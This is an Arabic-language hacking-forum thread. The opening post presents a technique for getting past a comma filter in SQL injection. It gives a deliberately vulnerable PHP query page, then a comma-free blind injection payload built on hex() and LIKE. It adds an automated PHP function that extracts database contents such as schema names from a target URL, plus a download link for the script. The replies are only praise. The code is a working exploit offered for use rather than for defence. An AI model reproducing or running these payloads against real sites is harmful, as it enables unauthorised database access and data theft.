1. V!P-Hero

    V!P-Hero DeveloPer Plus

    الأنتساب:
    ‏27 مارس 2012
    المشاركات:
    138
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    18
    الإقامة:
    هنااااااك
    [​IMG]

    اليوم جايبلكم معي سكربت قوي لتخطي فلتر الفواصل

    السكربت

    كود PHP:
    $ids=$_GET['id'];
    $ids=str_replace(",","",$ids);
    $connect=mysql_connect("localhost""albert""toor") or
        die(
    "Could not connect: " mysql_error());
    $conn=mysql_select_db("band3r",$connect);
     
    $sql="SELECT * FROM `mytable` WHERE `id`='$ids'";

    $result mysql_query($sql);
        if( 
    $result )
        {
            while( 
    $row mysql_fetch_array$result ) )
            {
                echo 
    $row['id'];
                echo 
    '<br>';
                echo 
    $row['****'];
                echo 
    '<br>';
                echo 
    $row['for'];
                echo 
    '<br>';
            }
        }
        else
        {
            echo 
    'error exit';
            exit;
        }

    ?>
    و بعد التفكير
    لايمكنك استعمال اي حقنة
    union query
    لاتنفع
    boolean based and time based
    نفس الشئ
    ما هي الطريقة ؟؟؟؟؟؟؟؟؟؟

    الحل و بعد التفكير العميق ههههه
    حقنة لاتستعمل الفواصل
    +
    اسرع من البليبد العادي
    الحل امامكم

    كود PHP:
    and hex(version()) like 'X%'
    الفكرة كما تلاحظون
    جلب استعلام السكيول و يشفيره و المقاربة
    التشفير بالهكس
    كل حرف مكون من عنصرين
    العنصر الاول من 2 حتى 7

    كود PHP:
    $hex1 = array(1234567);
    العنصر الثاني

    كود PHP:
    $hex2 = array(0123456789'a''b''c''d''e''f');
    الان طريقة العمل

    كود PHP:
    and hex((select group_concat(schema_****) from information_schema.schemata)) like 'X%'
    الان نقوم نتغيير X
    من 2 حتي 7
    حتي تصبح النتيجة صحيحة
    فرضا ان الرقم 6 اصبح النتيجة صحيحة
    الان تصبح

    كود PHP:
    and hex((select group_concat(schema_****) from information_schema.schemata)) like '6X%'
    الان نغس الشئ لكن العنصر الثاني احتمالية 16
    يعني شوف hex2
    و نغير حتي تصبح النتيجة صحيحة
    ثم نكون قد وصلنا الى الحرف الاول

    الطريقة اليدوية صعبة شوية
    جلست اما الجهاز و بعد التفكير الطويل تم الوصول الى برمجة دالة اوتوماتيكي
    تضغ الاستعلام + الهدف تعطيك النتيجة بدون وجع راس
    الدالة :

    كود PHP:
    /*
      coded by massacreur -- toxico-dz
      email :  w [email protected]
      home : sec4ever.com
    */ 
    function sql_inj($sql) {

      global 
    $target;
      global 
    $end;
      
    $hex1 = array(1234567);
    $hex2 = array(0123456789'a''b''c''d''e''f');
      
    $hex "";
      
    $m 0;
      while (
    $m == 0) {
        for (
    $i 0$i 7$i++) {
          
    $get "' and hex((" $sql ")) like '" $hex $hex1[$i] . $end;
          
    $get str_replace(' ''%20'$get);
          if (
    source($target $get) == 1) {
            
    $hex .= $hex1[$i];
            for (
    $h 0$h 16$h++) {
              
    $get2 "' and hex((" $sql ")) like '" $hex $hex2[$h] . $end;
              
    $get2 str_replace(' ''%20'$get2);
              if (
    source($target $get2) == 1) {
                
    $hex .= $hex2[$h];
                
    $h 20;
                
    $i 20;
                
    $marquer 'massacreur';
              }
            }
          }
          else {
            
    $marquer 'non';
          }
        }
        if (
    $marquer == 'non') {
    ///////
          
    $datas hextostr($hex);
          
    $datas explode(','$datas);
          
    $m 1;
        }
      }
      return 
    $datas;
    }

    function 
    hextostr($x) {
      
    $s '';
      foreach (@ 
    explode("\n"trim(chunk_split($x2))) as $h)
        
    $s .= chr(hexdec($h));
      return (
    $s);
    }
    شرح السكربت + ارفاق السكربت :{y.}

    http://www.iq-team.org/up/uploads/139677053783861.zip

    :{10}:
     
  2. ӎƦ.HmidE

    ӎƦ.HmidE DeveloPer Plus

    الأنتساب:
    ‏9 يوليو 2012
    المشاركات:
    106
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    الوظيفة:
    .....
    الإقامة:
    JoRdaN
    رد: يتخطى فلتر الفواصل في الحقن

    مشكور وبارك الله بيك :{12}:
     
  3. Mr.Flash

    Mr.Flash Developer

    الأنتساب:
    ‏14 نوفمبر 2012
    المشاركات:
    10
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    الإقامة:
    In Dreamweaver
    رد: يتخطى فلتر الفواصل في الحقن

    الله يعطيك العافيه &:"
     
  4. - ! • ĻİǾŊ ÄĹ-3ЯÁQ • ! -

    - ! • ĻİǾŊ ÄĹ-3ЯÁQ • ! - موقوف لمخالفة الشروط

    الأنتساب:
    ‏17 أكتوبر 2014
    المشاركات:
    79
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: يتخطى فلتر الفواصل في الحقن

    مبـــــــدع آستمر
     
  5. switch hack

    switch hack Developer

    الأنتساب:
    ‏24 يونيو 2014
    المشاركات:
    9
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: يتخطى فلتر الفواصل في الحقن

    واصل يا بطل
     
  6. Gaza-Dz

    Gaza-Dz Support - Iq-Team

    الأنتساب:
    ‏26 مايو 2013
    المشاركات:
    1,826
    الإعجابات المتلقاة:
    95
    نقاط الجائزة:
    48
    الجنس:
    ذكر
    الوظيفة:
    DZ
    الإقامة:
    DZ
    رد: يتخطى فلتر الفواصل في الحقن

    السلام عليكم ورحمة الله وبركاته
    يـــعــطــيـــك الـصحـــــــــــــة
    بانتظار كل ما هو جديدك
    ربي يفقك يا غالي
     
  7. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: يتخطى فلتر الفواصل في الحقن

    بوركت يابطل
    برمجة ذهبية
     

مشاركة هذه الصفحة